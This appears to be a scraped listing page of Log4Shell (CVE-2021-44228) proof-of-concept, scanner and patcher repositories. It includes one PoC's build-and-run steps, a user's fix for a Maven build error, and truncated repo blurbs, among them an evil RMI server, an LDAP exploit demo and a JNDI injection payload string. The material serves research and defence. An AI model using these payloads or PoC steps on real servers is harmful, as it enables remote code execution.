./build.sh
./start-log4j-rce-server.sh
java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in hack.log from current folderString[] cmds = { "sh", "-c", "echo 'Exploit at '" + getDateString() + " >> ./hack.log" };apache-log4j-poc/src/main/java/Exploit.java to whatever you like then rebuild and run testSpring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real
The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da
Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C
Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected
Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a
evil-rmi-server An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228 in a local privesc scenario Build ./gradlew
sample-ldap-exploit A short demo of CVE-2021-44228 Build $ mvn clean verify Run Attacker $ java \ -cp 'attacker/target/sample-attacker.jar:attacker
Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname
CVE-2021-44228 checker This is the repository for checking for vulnerability CVE-2021-44228. This is a PoC that only displays strings without any exte
this example worked as expected
execute build.sh, the following part
cd apache-log4j-poc mvn clean package
encounter BUILD FAILURE
[ERROR] Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.1:compile (default-compile) on project log4j-rce: Compilation failure: Compilation failure: [ERROR] Source option 5 is no longer supported. Use 6 or later. [ERROR] Target option 1.5 is no longer supported. Use 1.6 or later. [ERROR] -> [Help 1]
check https://stackoverflow.com/questions/53034953/error-source-option-5-is-no-longer-supported-use-6-or-later-on-maven-compile fixed compilation by adding the following code in apache-log4j-poc/pom.xml
<properties>
<maven.compiler.source>6</maven.compiler.source>
<maven.compiler.target>1.6</maven.compiler.target>
</properties>
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas
Log4jHotPatch This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded
CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex
Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on
JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnera
log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje
A Log4J2 CVE-2021-44228 Vulnerability Scanner and Patcher Links to download the latest version: Linux x64 with glibc2.17+ (RHEL7+) Windows & all other
MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4
CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin
Log4j CVE-2021-44228 and CVE-2021-45046 Requisites Use a vulnerable JDK, for instance JDK 1.8.0_181 Usage Malicious server The malicious server deploy
181 Dec 2, 2022
493 Dec 13, 2022
2 Dec 14, 2021
9 Jun 30, 2022
3 Dec 18, 2021
65 Dec 13, 2022
33 Jun 1, 2022
4 Jan 4, 2022
5 Feb 15, 2022
5 Feb 7, 2022